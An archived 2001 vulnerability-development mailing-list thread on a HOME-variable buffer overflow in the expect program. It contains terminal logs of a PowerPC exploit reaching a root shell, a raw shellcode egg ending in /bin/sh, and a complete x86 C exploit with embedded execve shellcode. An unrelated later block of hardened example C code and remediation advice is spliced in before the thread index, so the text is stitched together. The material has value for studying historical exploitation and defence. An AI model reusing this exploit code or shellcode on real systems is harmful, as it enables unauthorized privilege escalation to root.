Vulnerability Development mailing list archives
Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]
From: Charles Stevenson <core () ezlink com>
Date: Thu, 07 Jun 2001 19:52:55 -0600
F*#! I sent the wrong paste (lol)... yes, the easiest expect exploit if it was suid would be to call it directly... ;-) Here is the paste I meant to send:

[-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size: 512 Egg size: 2048 Aligment: 0]
[ Address: 0x100111f8 Offset: 0 ]
sh-2.05$ export HOME=$EGG
sh-2.05$ id
uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
sh-2.05# id
uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05# ps
  PID TTY          TIME CMD
 1791 pts/5    00:00:00 sh
 1793 pts/5    00:00:00 ps
sh-2.05# exit
sh-2.05$ echo $HOME
ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2x/?ÿA¼|h¦°Ãÿµ°Ãÿ°Ãÿ?ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿû
xÿûx8?ð8¦ô8æó|¥"x|ç"x|?:|Ä®|Ä*|ç(P|?*|¤"|¤*|(P|e|cxDÿÿ|£+x|À3x|Æ2x|§:|¥*|c!.|f"|Å!.|¥*xDÿÿ|à;xDÿÿÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2xKÿþý/bin/shZÿÿÿÿÿÿÿÿ

Assigning the contents of $EGG to $HOME being the key... Sorry folks about the earlier blunder... ;-)

Best Regards,
Charles Stevenson

Charles Stevenson wrote:
Kevin,

Here's the PPC shellcode info you asked for:

This is mainly a post of my PowerPC exploit efforts... anyways... Just for grins I tested a scenario under Debian PowerPC GNU/Linux with:

ii  expect5.31  5.31.8-3  A program that "talks" to other programs.

[-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect
[-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect
-rwsr-xr-x 1 root root 4328 Sep 20 2000 /usr/bin/expect
[-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size: 512 Egg size: 2048 Aligment: 0]
[ Address: 0x100111f8 Offset: 0 ]
sh-2.05$ id
uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
expect1.1> id
uid=1000(core) gid=1000(core) euid=0(root) groups=1000(core),4(adm),24(cdrom),29(audio)
expect1.2>

If you find a program that calls expect suid let me know ;-)

Best Regards,
Charles Stevenson

P.S. The "reet" tools I wrote to add PowerPC support are based on Aleph One's smashstack code. It's available at:
http://www.ezlink.com/~core/files/reet.tar.gz
(Comments welcome:)

I have found an overflow in, and coded the exploit code for, several versions of /usr/bin/expect... on SCO, Linux, and BSD variants. I am unable to think of a situation where this would be useful due to the fact that expect is not suid... Can anyone help me determine if this is exploitable to obtain root? Perhaps a suid expect script could be exploited? Or maybe something like suid kppp which calls expect as a helper program?

[root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
[root@linux elguapo]# expect
Segmentation fault (core dumped)

-Kevin Finisterre
dotslash () snosoft com

[attachment: expect.c]

//krfinisterre () checkfree com or dotslash () snosoft com
//this is output from my brute script...
//722
//Stack pointer: 0xbffffa18
// Offset: 0x2d3
// Return addr: 0xbffff745
//stack/brute.sh: line 11: 2190 Illegal instruction (core dumped) $3 $L
//723
//Stack pointer: 0xbffffa18
// Offset: 0x2d4
// Return addr: 0xbffff744
//sh-2.04#
//note that I was root when I ran this ... expect is not suid

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 533

unsigned long sp(void) { __asm__("movl %esp, %eax"); }

int main(int argc, char **argv)
{
    char hell[] =
        "\x29\xc0" "\x29\xc0" "\xb0\x47" "\x29\xdb" "\xb3\x0c" "\x89\xd9"
        "\xcd\x80" "\x5e" "\x29\xc0" "\x88\x46\x07" "\x89\x46\x0c"
        "\x89\x76\x08" "\xb0\x0b" "\x87\xf3" "\x8d\x4b\x08" "\x8d\x53\x0c"
        "\xcd\x80" "\xe8\xe3\xff\xff\xff" "\x2f\x62\x69\x6e\x2f\x73\x68";
    int i;
    int offset;
    long esp;
    long ret;
    long *addr_ptr;
    char *buffer, *ptr;

    offset = atoi(argv[1]);
    esp = sp();
    ret = esp - offset;

    if (!(buffer = malloc(BUFFERSIZE))) {
        printf("oops\n");
        exit(-1);
    }

    ptr = buffer;
    addr_ptr = (long *)ptr;
    for (i = 0; i < BUFFERSIZE; i += 4)
        *(addr_ptr++) = ret;

    for (i = 0; i < BUFFERSIZE / 2; i++)
        buffer[i] = '\xeb02';

    ptr = buffer + ((BUFFERSIZE / 2) - (strlen(hell) / 2));
    for (i = 0; i < strlen(hell); i++)
        *(ptr++) = hell[i];

    buffer[BUFFERSIZE - 1] = 0;
    setenv("HOME", buffer, 1);
    execlp("/usr/bin/expect", 0);
}
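The crash Kevin reports (expect dying on a 433-byte HOME) is the classic pattern of copying an environment variable into a fixed-size stack buffer with no length check. The following is an added example, not code from this thread, from expect, or from either poster: a hypothetical program that builds a per-user file path from $HOME, shown in the unsafe form and in a hardened form that validates the value before copying. The file name "/.expect.rc", the 256-byte buffer, and the 'A'-filled HOME values (mirroring the perl one-liner above) are assumptions constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed destination size. A 433-byte HOME (the crash length in the
 * thread) cannot fit here once a suffix is appended. */
#define RC_PATH_MAX 256

/* Unsafe pattern, kept only for contrast and never called with
 * untrusted input in this example: HOME goes into a fixed buffer with
 * no length check, so an oversized value overruns the caller's frame. */
void build_rc_path_unsafe(char *out, const char *home)
{
    strcpy(out, home);
    strcat(out, "/.expect.rc");
}

/* Hardened version: check the length up front and refuse rather than
 * truncate or overflow. Returns 0 on success, -1 if HOME is missing,
 * not an absolute path, or too long for the destination. */
int build_rc_path_safe(char *out, size_t outlen, const char *home)
{
    static const char suffix[] = "/.expect.rc";   /* assumed file name */
    size_t hlen;

    if (home == NULL || home[0] != '/')
        return -1;
    hlen = strlen(home);
    /* sizeof(suffix) already counts the terminating NUL */
    if (hlen + sizeof(suffix) > outlen)
        return -1;
    memcpy(out, home, hlen);
    memcpy(out + hlen, suffix, sizeof(suffix));
    return 0;
}

/* Constructed test input: an absolute path of exactly n bytes, "/"
 * followed by n-1 'A' characters. Caller frees the result. */
char *constructed_home(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL || n == 0)
        return NULL;
    s[0] = '/';
    memset(s + 1, 'A', n - 1);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char path[RC_PATH_MAX];
    char *big = constructed_home(433);

    if (build_rc_path_safe(path, sizeof path, "/home/core") == 0)
        printf("accepted: %s\n", path);
    if (build_rc_path_safe(path, sizeof path, big) != 0)
        printf("rejected: HOME of %zu bytes does not fit in %d\n",
               strlen(big), RC_PATH_MAX);
    free(big);
    return 0;
}
```

The bounds check closes the overflow, but for a setuid program the stronger fix is to not trust HOME at all: an attacker controls the entire environment of a setuid process, so the home directory should come from getpwuid(getuid())->pw_dir, and on distributions of the period the overflow only matters, as the thread notes, if expect or a wrapper around it runs with elevated privileges.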
Current thread:
- [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] KF (Jun 05)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Kevin J. Menard, Jr. (Jun 05)
- Re: [Returned Post...Expect overflows KF (Jun 05)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
- Re: Returned post ... Expect overflows KF (Jun 08)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
- Expect Overflow (Continued) Charles Stevenson (Jun 08)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Kevin J. Menard, Jr. (Jun 05)